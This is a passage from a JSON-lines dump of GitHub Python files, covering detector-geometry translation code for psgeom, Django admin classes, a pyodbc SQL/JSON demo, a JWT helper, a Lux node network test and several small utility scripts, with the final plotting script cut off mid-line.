0:\n dfs(*to_visit.pop())\n\n return\n\n dfs(base[\"hierarchy\"], get_F(base[\"hierarchy\"]))\n\n # this code checks to make sure we got all the panels\n # and that they get added in order\n bg = basisgrid.BasisGrid()\n for k in range(max(bg_tmp.keys())+1):\n if k in list(bg_tmp.keys()):\n bg.add_grid(*bg_tmp[k])\n else:\n print('WARNING: panel %d seems to be missing' % k)\n \n geom_instance = obj.from_basisgrid(bg)\n\n return geom_instance\n\n \n# ---- generic text ------------------------------------------------------------\n \n \ndef write_psf_text(detector, filename):\n \"\"\"\n Write a geometry to disk in the following format:\n \n p_x p_y p_z s_x s_y s_z f_x f_y f_z\n ...\n \n and include some comments. \n \n \n Parameters\n ----------\n geometry : cspad.CSPad\n The detector geometry to write to disk\n \n filname : str\n The name of file to write. Will end in '.dtc'\n \"\"\"\n \n # generate a preamble\n preamble = \"\"\"\n# This file contains a CSPAD geometry generated by psgeom: \n# https://github.com/LinacCoherentLightSource/psgeom\n#\n# The following is a basis grid representation with the following vectors\n#\n# p : position vector for an ASIC\n# s : slow-scan pixel vector\n# f : fast-scan pixel vector\n#\n# all units are mm. Each ASIC is 185 x 194 pixels.\n# See the psgeom documentation for more information.\n\n\n# p_x p_y p_z s_x s_y s_z f_x f_y f_z\n\"\"\"\n\n # loop over each grid element and add it to the file\n bg = detector.to_basisgrid()\n body = \"\"\n \n \n def format(s, total_len=10):\n \"\"\"\n A little formatting function\n \"\"\"\n sf = '%.5f' % s\n pad = total_len - len(sf)\n if pad > 0:\n sf = ' ' * pad + sf\n return sf\n \n \n for i in range(bg.num_grids):\n \n # if we're starting a new quad, note that in the file\n if i % 16 == 0:\n body += ('\\n# QUAD %d\\n' % (i/16))\n \n # add the basis grid\n p, s, f, shp = bg.get_grid(i)\n strp = ' '.join( [ format(x) for x in p ] )\n strs = ' '.join( [ format(x) for x in s ] )\n strf = ' '.join( [ format(x) for x in f ] )\n \n tb = ' ' * 4\n asic = str(i)\n if len(asic) == 1:\n asic = ' ' + asic\n \n body += (asic + tb + strp + tb + strs + tb + strf + '\\n')\n \n f = open(filename, 'w')\n f.write(preamble + body)\n f.close()\n \n print(\"Wrote CSPAD to text at: %s\" % filename)\n \n return\n \n \n\n# ---------- REFERENCE DATA ---------------------------------------------------\n\ngeneric_header = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarentee these values are what you desire\n; however they are filled in with some decent defaults\n\n; clen = /LCLS/detector_1/EncoderValue\n; photon_energy = /LCLS/photon_energy_eV\n; adu_per_eV = 0.1\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\"\"\"\n\ngeneric_header_noClen = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarentee these values are what you desire\n; however they are filled in with some decent defaults\n\n; clen = /LCLS/detector_1/EncoderValue\nphoton_energy = /LCLS/photon_energy_eV\nadu_per_eV = 0.1\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\"\"\"\n\n\ncspad_header = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarantee these values are what you desire\n; however they are filled in with some decent defaults\n; for the large CSPAD detector.\n\nclen = /LCLS/detector_1/EncoderValue\nphoton_energy = /LCLS/photon_energy_eV\nres = 9097.52\nadu_per_eV = 0.00338\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\n\"\"\"\n\ncspad_header_noClen = \"\"\"\n; --- VALUES YOU MAY WANT TO FILL IN MANUALLY ---\n; we cannot guarantee these values are what you desire\n; however they are filled in with some decent defaults\n; for the large CSPAD detector. Note that clen is \n; commented out.\n\n;clen = /LCLS/detector_1/EncoderValue\nphoton_energy = /LCLS/photon_energy_eV\nres = 9097.52\nadu_per_eV = 0.00338\n\ndata = /entry_1/data_1/data\n\ndim0 = %\ndim1 = ss\ndim2 = fs\n\n\"\"\"\n\ncspad_groups = \"\"\"\n\n; The following lines define \"rigid groups\" which express the physical\n; construction of the detector. This is used when refining the detector\n; geometry.\n\nrigid_group_q0 = q0a0,q0a1,q0a2,q0a3,q0a4,q0a5,q0a6,q0a7,q0a8,q0a9,q0a10,q0a11,q0a12,q0a13,q0a14,q0a15\nrigid_group_q1 = q1a0,q1a1,q1a2,q1a3,q1a4,q1a5,q1a6,q1a7,q1a8,q1a9,q1a10,q1a11,q1a12,q1a13,q1a14,q1a15\nrigid_group_q2 = q2a0,q2a1,q2a2,q2a3,q2a4,q2a5,q2a6,q2a7,q2a8,q2a9,q2a10,q2a11,q2a12,q2a13,q2a14,q2a15\nrigid_group_q3 = q3a0,q3a1,q3a2,q3a3,q3a4,q3a5,q3a6,q3a7,q3a8,q3a9,q3a10,q3a11,q3a12,q3a13,q3a14,q3a15\n\nrigid_group_a0 = q0a0,q0a1\nrigid_group_a1 = q0a2,q0a3\nrigid_group_a2 = q0a4,q0a5\nrigid_group_a3 = q0a6,q0a7\nrigid_group_a4 = q0a8,q0a9\nrigid_group_a5 = q0a10,q0a11\nrigid_group_a6 = q0a12,q0a13\nrigid_group_a7 = q0a14,q0a15\nrigid_group_a8 = q1a0,q1a1\nrigid_group_a9 = q1a2,q1a3\nrigid_group_a10 = q1a4,q1a5\nrigid_group_a11 = q1a6,q1a7\nrigid_group_a12 = q1a8,q1a9\nrigid_group_a13 = q1a10,q1a11\nrigid_group_a14 = q1a12,q1a13\nrigid_group_a15 = q1a14,q1a15\nrigid_group_a16 = q2a0,q2a1\nrigid_group_a17 = q2a2,q2a3\nrigid_group_a18 = q2a4,q2a5\nrigid_group_a19 = q2a6,q2a7\nrigid_group_a20 = q2a8,q2a9\nrigid_group_a21 = q2a10,q2a11\nrigid_group_a22 = q2a12,q2a13\nrigid_group_a23 = q2a14,q2a15\nrigid_group_a24 = q3a0,q3a1\nrigid_group_a25 = q3a2,q3a3\nrigid_group_a26 = q3a4,q3a5\nrigid_group_a27 = q3a6,q3a7\nrigid_group_a28 = q3a8,q3a9\nrigid_group_a29 = q3a10,q3a11\nrigid_group_a30 = q3a12,q3a13\nrigid_group_a31 = q3a14,q3a15\n\nrigid_group_collection_quadrants = q0,q1,q2,q3\nrigid_group_collection_asics = a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,a10,a11,a12,a13,a14,a15,a16,a17,a18,a19,a20,a21,a22,a23,a24,a25,a26,a27,a28,a29,a30,a31\n\n; -----------------------------------------------\n\n\"\"\"\n\n\ncrystfel_cheetah_intensities = \"\"\"q0a0/min_fs = 0\nq0a0/min_ss = 0\nq0a0/max_fs = 193\nq0a0/max_ss = 184\n-\nq0a1/min_fs = 194\nq0a1/min_ss = 0\nq0a1/max_fs = 387\nq0a1/max_ss = 184\n-\nq0a2/min_fs = 0\nq0a2/min_ss = 185\nq0a2/max_fs = 193\nq0a2/max_ss = 369\n-\nq0a3/min_fs = 194\nq0a3/min_ss = 185\nq0a3/max_fs = 387\nq0a3/max_ss = 369\n-\nq0a4/min_fs = 0\nq0a4/min_ss = 370\nq0a4/max_fs = 193\nq0a4/max_ss = 554\n-\nq0a5/min_fs = 194\nq0a5/min_ss = 370\nq0a5/max_fs = 387\nq0a5/max_ss = 554\n-\nq0a6/min_fs = 0\nq0a6/min_ss = 555\nq0a6/max_fs = 193\nq0a6/max_ss = 739\n-\nq0a7/min_fs = 194\nq0a7/min_ss = 555\nq0a7/max_fs = 387\nq0a7/max_ss = 739\n-\nq0a8/min_fs = 0\nq0a8/min_ss = 740\nq0a8/max_fs = 193\nq0a8/max_ss = 924\n-\nq0a9/min_fs = 194\nq0a9/min_ss = 740\nq0a9/max_fs = 387\nq0a9/max_ss = 924\n-\nq0a10/min_fs = 0\nq0a10/min_ss = 925\nq0a10/max_fs = 193\nq0a10/max_ss = 1109\n-\nq0a11/min_fs = 194\nq0a11/min_ss = 925\nq0a11/max_fs = 387\nq0a11/max_ss = 1109\n-\nq0a12/min_fs = 0\nq0a12/min_ss = 1110\nq0a12/max_fs = 193\nq0a12/max_ss = 1294\n-\nq0a13/min_fs = 194\nq0a13/min_ss = 1110\nq0a13/max_fs = 387\nq0a13/max_ss = 1294\n-\nq0a14/min_fs = 0\nq0a14/min_ss = 1295\nq0a14/max_fs = 193\nq0a14/max_ss = 1479\n-\nq0a15/min_fs = 194\nq0a15/min_ss = 1295\nq0a15/max_fs = 387\nq0a15/max_ss = 1479\n-\nq1a0/min_fs = 388\nq1a0/min_ss = 0\nq1a0/max_fs = 581\nq1a0/max_ss = 184\n-\nq1a1/min_fs = 582\nq1a1/min_ss = 0\nq1a1/max_fs = 775\nq1a1/max_ss = 184\n-\nq1a2/min_fs = 388\nq1a2/min_ss = 185\nq1a2/max_fs = 581\nq1a2/max_ss = 369\n-\nq1a3/min_fs = 582\nq1a3/min_ss = 185\nq1a3/max_fs = 775\nq1a3/max_ss = 369\n-\nq1a4/min_fs = 388\nq1a4/min_ss = 370\nq1a4/max_fs = 581\nq1a4/max_ss = 554\n-\nq1a5/min_fs = 582\nq1a5/min_ss = 370\nq1a5/max_fs = 775\nq1a5/max_ss = 554\n-\nq1a6/min_fs = 388\nq1a6/min_ss = 555\nq1a6/max_fs = 581\nq1a6/max_ss = 739\n-\nq1a7/min_fs = 582\nq1a7/min_ss = 555\nq1a7/max_fs = 775\nq1a7/max_ss = 739\n-\nq1a8/min_fs = 388\nq1a8/min_ss = 740\nq1a8/max_fs = 581\nq1a8/max_ss = 924\n-\nq1a9/min_fs = 582\nq1a9/min_ss = 740\nq1a9/max_fs = 775\nq1a9/max_ss = 924\n-\nq1a10/min_fs = 388\nq1a10/min_ss = 925\nq1a10/max_fs = 581\nq1a10/max_ss = 1109\n-\nq1a11/min_fs = 582\nq1a11/min_ss = 925\nq1a11/max_fs = 775\nq1a11/max_ss = 1109\n-\nq1a12/min_fs = 388\nq1a12/min_ss = 1110\nq1a12/max_fs = 581\nq1a12/max_ss = 1294\n-\nq1a13/min_fs = 582\nq1a13/min_ss = 1110\nq1a13/max_fs = 775\nq1a13/max_ss = 1294\n-\nq1a14/min_fs = 388\nq1a14/min_ss = 1295\nq1a14/max_fs = 581\nq1a14/max_ss = 1479\n-\nq1a15/min_fs = 582\nq1a15/min_ss = 1295\nq1a15/max_fs = 775\nq1a15/max_ss = 1479\n-\nq2a0/min_fs = 776\nq2a0/min_ss = 0\nq2a0/max_fs = 969\nq2a0/max_ss = 184\n-\nq2a1/min_fs = 970\nq2a1/min_ss = 0\nq2a1/max_fs = 1163\nq2a1/max_ss = 184\n-\nq2a2/min_fs = 776\nq2a2/min_ss = 185\nq2a2/max_fs = 969\nq2a2/max_ss = 369\n-\nq2a3/min_fs = 970\nq2a3/min_ss = 185\nq2a3/max_fs = 1163\nq2a3/max_ss = 369\n-\nq2a4/min_fs = 776\nq2a4/min_ss = 370\nq2a4/max_fs = 969\nq2a4/max_ss = 554\n-\nq2a5/min_fs = 970\nq2a5/min_ss = 370\nq2a5/max_fs = 1163\nq2a5/max_ss = 554\n-\nq2a6/min_fs = 776\nq2a6/min_ss = 555\nq2a6/max_fs = 969\nq2a6/max_ss = 739\n-\nq2a7/min_fs = 970\nq2a7/min_ss = 555\nq2a7/max_fs = 1163\nq2a7/max_ss = 739\n-\nq2a8/min_fs = 776\nq2a8/min_ss = 740\nq2a8/max_fs = 969\nq2a8/max_ss = 924\n-\nq2a9/min_fs = 970\nq2a9/min_ss = 740\nq2a9/max_fs = 1163\nq2a9/max_ss = 924\n-\nq2a10/min_fs = 776\nq2a10/min_ss = 925\nq2a10/max_fs = 969\nq2a10/max_ss = 1109\n-\nq2a11/min_fs = 970\nq2a11/min_ss = 925\nq2a11/max_fs = 1163\nq2a11/max_ss = 1109\n-\nq2a12/min_fs = 776\nq2a12/min_ss = 1110\nq2a12/max_fs = 969\nq2a12/max_ss = 1294\n-\nq2a13/min_fs = 970\nq2a13/min_ss = 1110\nq2a13/max_fs = 1163\nq2a13/max_ss = 1294\n-\nq2a14/min_fs = 776\nq2a14/min_ss = 1295\nq2a14/max_fs = 969\nq2a14/max_ss = 1479\n-\nq2a15/min_fs = 970\nq2a15/min_ss = 1295\nq2a15/max_fs = 1163\nq2a15/max_ss = 1479\n-\nq3a0/min_fs = 1164\nq3a0/min_ss = 0\nq3a0/max_fs = 1357\nq3a0/max_ss = 184\n-\nq3a1/min_fs = 1358\nq3a1/min_ss = 0\nq3a1/max_fs = 1551\nq3a1/max_ss = 184\n-\nq3a2/min_fs = 1164\nq3a2/min_ss = 185\nq3a2/max_fs = 1357\nq3a2/max_ss = 369\n-\nq3a3/min_fs = 1358\nq3a3/min_ss = 185\nq3a3/max_fs = 1551\nq3a3/max_ss = 369\n-\nq3a4/min_fs = 1164\nq3a4/min_ss = 370\nq3a4/max_fs = 1357\nq3a4/max_ss = 554\n-\nq3a5/min_fs = 1358\nq3a5/min_ss = 370\nq3a5/max_fs = 1551\nq3a5/max_ss = 554\n-\nq3a6/min_fs = 1164\nq3a6/min_ss = 555\nq3a6/max_fs = 1357\nq3a6/max_ss = 739\n-\nq3a7/min_fs = 1358\nq3a7/min_ss = 555\nq3a7/max_fs = 1551\nq3a7/max_ss = 739\n-\nq3a8/min_fs = 1164\nq3a8/min_ss = 740\nq3a8/max_fs = 1357\nq3a8/max_ss = 924\n-\nq3a9/min_fs = 1358\nq3a9/min_ss = 740\nq3a9/max_fs = 1551\nq3a9/max_ss = 924\n-\nq3a10/min_fs = 1164\nq3a10/min_ss = 925\nq3a10/max_fs = 1357\nq3a10/max_ss = 1109\n-\nq3a11/min_fs = 1358\nq3a11/min_ss = 925\nq3a11/max_fs = 1551\nq3a11/max_ss = 1109\n-\nq3a12/min_fs = 1164\nq3a12/min_ss = 1110\nq3a12/max_fs = 1357\nq3a12/max_ss = 1294\n-\nq3a13/min_fs = 1358\nq3a13/min_ss = 1110\nq3a13/max_fs = 1551\nq3a13/max_ss = 1294\n-\nq3a14/min_fs = 1164\nq3a14/min_ss = 1295\nq3a14/max_fs = 1357\nq3a14/max_ss = 1479\n-\nq3a15/min_fs = 1358\nq3a15/min_ss = 1295\nq3a15/max_fs = 1551\nq3a15/max_ss = 1479\"\"\"\n\n\n","repo_name":"slaclab/psgeom","sub_path":"psgeom/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":49340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39383483815","text":"from datetime import datetime, timedelta\nimport pandas as pd\n\n\ndef fill_up_missing_dates(dates):\n dat = list(map(lambda x: datetime.strptime(x, '%d.%m.%Y'), dates))\n result = []\n for d in pd.date_range(min(dat), max(dat)):\n result.append(d.strftime('%d.%m.%Y'))\n return result\n","repo_name":"Serebryankka/My-Solutions-Python-Generation-a-course-for-professionals","sub_path":"Module_3/Module_3_4/Module_3_4_21.py","file_name":"Module_3_4_21.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24644696814","text":"import json\nimport xml.etree.ElementTree as ET\n\nfrom cafe.engine.models.base import AutoMarshallingModel\nfrom cloudcafe.compute.common.constants import Constants\n\n\nclass GetConsoleOutput(AutoMarshallingModel):\n \"\"\"\n Get Console Output Request Object\n \"\"\"\n\n def __init__(self, length):\n self.length = length\n\n def _obj_to_json(self):\n json_dict = {\"length\": str(self.length)}\n return json.dumps({\"os-getConsoleOutput\": json_dict})\n\n def _obj_to_xml(self):\n xml = Constants.XML_HEADER\n element = ET.Element(\"os-getConsoleOutput\")\n element.set(\"length\", str(self.length))\n xml += ET.tostring(element)\n return xml\n","repo_name":"jcourtois/rpc9_cloudcafe","sub_path":"cloudcafe/compute/extensions/console_output_api/models/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32270359927","text":"from django.contrib import admin\n\n# Register your models here.\nfrom mapmaker.models import City,Markup\n\nclass CityAdmin(admin.ModelAdmin):\n exclude = ('client',)\n list_display = ('location', 'name',)\n\n def save_model(self, request, obj, form, change):\n if not change:\n obj.client = request.user\n obj.save()\n\n def get_queryset(self, request):\n qs = super(CityAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(client=request.user)\n\nadmin.site.register(City,CityAdmin)\n\nclass MarkupAdmin(admin.ModelAdmin):\n # exclude = ('client',)\n\n # users can only see their own (unless superuser)\n def get_queryset(self, request):\n qs = super(MarkupAdmin, self).get_queryset(request)\n if request.user.is_superuser:\n return qs\n return qs.filter(client=request.user)\n\nadmin.site.register(Markup,MarkupAdmin)\n","repo_name":"nepakala/hostgator-django","sub_path":"database/mapmaker/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35936528580","text":"import argparse\nfrom pyhsm.hsmclient import HsmClient\n\n\nparser = argparse.ArgumentParser(\"listslots\", description=\"List HSM slots.\")\nparser.add_argument(\"-p11\", dest=\"module\", required=True,\n help=\"Full path to HSM's PKCS#11 shared library.\")\nargs = parser.parse_args()\n\n# note: listing slot information does not require a login\n# example connects to the open source softHSM v2\nwith HsmClient(pkcs11_lib=args.module) as c:\n for s in c.get_slot_info():\n print(\"----------------------------------------\")\n print(s.to_string())\n","repo_name":"bentonstark/py-hsm","sub_path":"examples/listslots.py","file_name":"listslots.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"37"} +{"seq_id":"38731651092","text":"from turtle import clear\r\nimport pyodbc\r\n\r\nconn = pyodbc.connect(\r\n \"Driver={SQL Server};\"\r\n \"Server=GWTN141-10;\"\r\n \"Database=AdventureWorks2019;\"\r\n \"Trust_Connection=yes;\"\r\n)\r\n\r\nclass sqljson:\r\n cursor = conn.cursor()\r\n def __init__(self, connectdb):\r\n self.connectdb = connectdb \r\n\r\n def read(self):\r\n print(\"Read\")\r\n sqljson.cursor.execute(\"select top 3 BusinessEntityID, FirstName, MiddleName, LastName from [Person].[Person]\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n\r\n def likeqry(self):\r\n print(\"Like Query\")\r\n sqljson.cursor.execute(\"SELECT top 5 [BusinessEntityID], [JobTitle] FROM [HumanResources].[Employee] e WHERE JobTitle LIKE 'Design%'\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n \r\n def INqry(self):\r\n print(\"In Query\")\r\n sqljson.cursor.execute(\"SELECT top 5 [BusinessEntityID],JobTitle FROM [HumanResources].[Employee] e WHERE JobTitle in ('Engineering Manager','Senior Tool Designer')\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def betweenqry(self):\r\n print(\"Between Query\")\r\n sqljson.cursor.execute(\"SELECT top 5 SalesOrderID, OrderDate, DueDate FROM Sales.SalesOrderHeader WHERE [OrderDate] BETWEEN '4/16/2011' AND '12/15/2011'\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def lessthanqry(conn):\r\n print(\"Between Query\")\r\n sqljson.cursor.execute(\"SELECT BusinessEntityID, FirstName, LastName FROM [Person].[Person] WHERE BusinessEntityID <= 10\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def joinqry(conn):\r\n print(\"Join Tables\")\r\n sqljson.cursor.execute(\"SELECT top 5 E.NationalIDNumber, E.JobTitle, P.FirstName, P.LastName FROM [HumanResources].[Employee] as E INNER JOIN [Person].[Person] as P on E.BusinessEntityID = P.BusinessEntityID\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n def ConverttOjson(conn):\r\n print(\"Convert to Json\")\r\n sqljson.cursor.execute(\"select top 3 BusinessEntityID, FirstName, MiddleName, LastName from [Person].[Person] For JSON PATH, ROOT('Person')\")\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n \r\n def queryjson(self):\r\n print(\"Query Json Data\")\r\n sqljson.cursor.execute('''DECLARE @json NVARCHAR(1000)\r\n SELECT @json = N'{\r\n \"Person\": [\r\n {\r\n \"BusinessEntityID\": 285,\r\n \"FirstName\": \"Syed\",\r\n \"LastName\": \"Abbas\"\r\n },\r\n {\r\n \"BusinessEntityID\": 293,\r\n \"FirstName\": \"Catherine\",\r\n \"LastName\": \"Abel\"\r\n },\r\n {\r\n \"BusinessEntityID\": 295,\r\n \"FirstName\": \"Kim\",\r\n \"LastName\": \"Abercrombie\"\r\n }\r\n ]\r\n }'\r\n select BusinessEntityID, FirstName, LastName\r\n FROM OPENJSON(@json, '$.Person')\r\n WITH(\r\n BusinessEntityID INT,\r\n FirstName varchar(500),\r\n LastName varchar(500)\r\n ) as Person ''')\r\n for row in sqljson.cursor:\r\n print(row)\r\n print()\r\n\r\n \r\nobj1 = sqljson(\"converter\")\r\ntestprog=int(input(\"Enter any value to test options or 0 to end::\"))\r\nwhile(testprog!=0):\r\n print(\"Sql and Json Queries Options \\n1. Read Sql Server Data \\n2. Like Query\")\r\n print(\"3. IN Query \\n4. Between Query \\n5. Logical Operation Query\")\r\n print(\"6. Join Query \\n7. Convert to Json \\n8. Query Json\")\r\n option=int(input(\"Enter your choice of query::\"))\r\n if(option==1):\r\n obj1.read()\r\n elif(option==2):\r\n obj1.likeqry()\r\n elif(option==3):\r\n obj1.INqry()\r\n elif(option==4):\r\n obj1.betweenqry()\r\n elif(option==5):\r\n obj1.lessthanqry()\r\n elif(option==6):\r\n obj1.joinqry()\r\n elif(option==7):\r\n obj1.ConverttOjson()\r\n elif(option==8):\r\n obj1.queryjson()\r\n testprog=int(input(\"\\n Enter any value to test options or 0 to end::\"))","repo_name":"comptechric/monolithicSqlj","sub_path":"monolithicSqljson.py","file_name":"monolithicSqljson.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42425548490","text":"from datetime import timedelta, datetime\n\nfrom jose import jwt as jose_jwt\nfrom jose.exceptions import JWTError\n\nfrom app.core.config import settings\nfrom app.core.exceptions import InvalidCredentials\nfrom app.schemas.token import TokenPayload\n\n\nclass JWT:\n def create_access_token(self, subject: str, expires_delta: timedelta = None) -> str:\n if expires_delta:\n expires = datetime.utcnow() + expires_delta\n else:\n expires = datetime.utcnow() + timedelta(\n minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES\n )\n token = jose_jwt.encode(\n {\"exp\": expires, \"sub\": str(subject)},\n str(settings.SECRET_KEY),\n algorithm=settings.ALGORITHM,\n )\n return token\n\n def decode_access_token(self, token: str) -> TokenPayload:\n try:\n payload = jose_jwt.decode(\n token, str(settings.SECRET_KEY), algorithms=[settings.ALGORITHM]\n )\n return TokenPayload(**payload)\n except JWTError:\n raise InvalidCredentials(\"Invalid access token\")\n\n\njwt = JWT()\n","repo_name":"Simon3640/cotizadorV2","sub_path":"app/infraestructure/security/jwt.py","file_name":"jwt.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3259979697","text":"\"\"\"Supported Keras Layers are defined in this module.\"\"\"\nfrom keras import layers\n\n# List of currently supported Keras Layers\nSUPPORTED_LAYERS = [\n layers.Dense,\n layers.Conv2D\n]\n\n\ndef is_supported_layer(layer):\n \"\"\"This function tests if a layer is officially supported by this framework.\n\n Args:\n layer: Layer to test\n Returns:\n True if supported. False if not supported.\n \"\"\"\n for supported_layer in SUPPORTED_LAYERS:\n if isinstance(layer, supported_layer):\n return True\n return False\n","repo_name":"SirBubbls/condense","sub_path":"condense/keras/support.py","file_name":"support.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11319389008","text":"from collections import Counter\nimport matplotlib.pyplot as plt\n\nnum_friends = [100,49,41,40,40,40,40,40]\nfriend_counts = Counter(num_friends)\n# The highest number is 100\nxs = range(101)\nys= [friend_counts[x] for x in xs]\n\nplt.bar(xs,ys)\nplt.axis([0,50,0,25])\nplt.title(\"Histogram of number of friends\")\nplt.xlabel(\"Number of friends\")\nplt.ylabel(\"Number of members\")\nplt.show()","repo_name":"dadalib/data_science_exercices","sub_path":"data_visualisation_chp5_1.py","file_name":"data_visualisation_chp5_1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10463315404","text":"import time\n\nfrom test_framework.test_framework import LuxTestFramework\nfrom test_framework.util import (\n assert_equal,\n assert_raises_rpc_error,\n connect_nodes_bi,\n p2p_port,\n)\n\nclass NetTest(LuxTestFramework):\n def set_test_params(self):\n self.setup_clean_chain = True\n self.num_nodes = 2\n\n def run_test(self):\n self._test_connection_count()\n self._test_getnettotals()\n self._test_getnetworkinginfo()\n self._test_getaddednodeinfo()\n self._test_getpeerinfo()\n\n def _test_connection_count(self):\n # connect_nodes_bi connects each node to the other\n assert_equal(self.nodes[0].getconnectioncount(), 2)\n\n def _test_getnettotals(self):\n # check that getnettotals totalbytesrecv and totalbytessent\n # are consistent with getpeerinfo\n peer_info = self.nodes[0].getpeerinfo()\n assert_equal(len(peer_info), 2)\n net_totals = self.nodes[0].getnettotals()\n assert_equal(sum([peer['bytesrecv'] for peer in peer_info]),\n net_totals['totalbytesrecv'])\n assert_equal(sum([peer['bytessent'] for peer in peer_info]),\n net_totals['totalbytessent'])\n # test getnettotals and getpeerinfo by doing a ping\n # the bytes sent/received should change\n # note ping and pong are 32 bytes each\n self.nodes[0].ping()\n time.sleep(0.1)\n peer_info_after_ping = self.nodes[0].getpeerinfo()\n net_totals_after_ping = self.nodes[0].getnettotals()\n for before, after in zip(peer_info, peer_info_after_ping):\n assert_equal(before['bytesrecv_per_msg']['pong'] + 32, after['bytesrecv_per_msg']['pong'])\n assert_equal(before['bytessent_per_msg']['ping'] + 32, after['bytessent_per_msg']['ping'])\n assert_equal(net_totals['totalbytesrecv'] + 32*2, net_totals_after_ping['totalbytesrecv'])\n assert_equal(net_totals['totalbytessent'] + 32*2, net_totals_after_ping['totalbytessent'])\n\n def _test_getnetworkinginfo(self):\n assert_equal(self.nodes[0].getnetworkinfo()['networkactive'], True)\n assert_equal(self.nodes[0].getnetworkinfo()['connections'], 2)\n\n self.nodes[0].setnetworkactive(False)\n assert_equal(self.nodes[0].getnetworkinfo()['networkactive'], False)\n timeout = 3\n while self.nodes[0].getnetworkinfo()['connections'] != 0:\n # Wait a bit for all sockets to close\n assert timeout > 0, 'not all connections closed in time'\n timeout -= 0.1\n time.sleep(0.1)\n\n self.nodes[0].setnetworkactive(True)\n connect_nodes_bi(self.nodes, 0, 1)\n assert_equal(self.nodes[0].getnetworkinfo()['networkactive'], True)\n assert_equal(self.nodes[0].getnetworkinfo()['connections'], 2)\n\n def _test_getaddednodeinfo(self):\n assert_equal(self.nodes[0].getaddednodeinfo(), [])\n # add a node (node2) to node0\n ip_port = \"127.0.0.1:{}\".format(p2p_port(2))\n self.nodes[0].addnode(ip_port, 'add')\n # check that the node has indeed been added\n added_nodes = self.nodes[0].getaddednodeinfo(ip_port)\n assert_equal(len(added_nodes), 1)\n assert_equal(added_nodes[0]['addednode'], ip_port)\n # check that a non-existant node returns an error\n assert_raises_rpc_error(-24, \"Node has not been added\",\n self.nodes[0].getaddednodeinfo, '1.1.1.1')\n\n def _test_getpeerinfo(self):\n peer_info = [x.getpeerinfo() for x in self.nodes]\n # check both sides of bidirectional connection between nodes\n # the address bound to on one side will be the source address for the other node\n assert_equal(peer_info[0][0]['addrbind'], peer_info[1][0]['addr'])\n assert_equal(peer_info[1][0]['addrbind'], peer_info[0][0]['addr'])\n\nif __name__ == '__main__':\n NetTest().main()\n","repo_name":"LUX-Core/lux","sub_path":"test/functional/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":3836,"dataset":"github-code","pt":"37"} +{"seq_id":"40861719675","text":"from rest_framework import serializers\nfrom goods_map.goods.models import GoodsModel\n\n\nclass GoodsSerializers(serializers.ModelSerializer):\n class Meta:\n model = GoodsModel\n fields = ['id',\n 'name',\n # 'cost_price',\n 'wholesale_price',\n 'retail_price',\n # 'weight',\n 'store_hall',\n 'store_back',\n 'store_up',\n # 'stock'\n ]\n","repo_name":"Nurlan-Aliev/track_stock_back","sub_path":"goods_map/goods/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6139664893","text":"# Importa las bibliotecas necesarias\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nimport matplotlib.pyplot as plt\r\n\r\n# Cargar los datos y preparar el Data Frame\r\ndf = pd.read_csv(r'D:\\Germán\\Desktop\\Python Files\\automobile.csv')\r\ndf = df.dropna(axis=0)\r\n\r\n# Separar las características x e y\r\nx = df[['horsepower']]\r\ny = df['price']\r\n\r\n# Entrena el árbol de regresión\r\nregression_tree = DecisionTreeRegressor(max_depth=2)\r\nregression_tree.fit(x, y)\r\n\r\n# Predice valores para nuevos datos\r\nx_test = np.arange(0.0, 250.0, 1)[:, np.newaxis] # Ajusta el rango de x_test según tus datos\r\ny_pred = regression_tree.predict(x_test)\r\n\r\n# Grafica los resultados\r\nplt.figure()\r\nplt.scatter(x, y, s=20, edgecolor=\"black\", c=\"darkorange\", label=\"Datos\")\r\nplt.plot(x_test, y_pred, 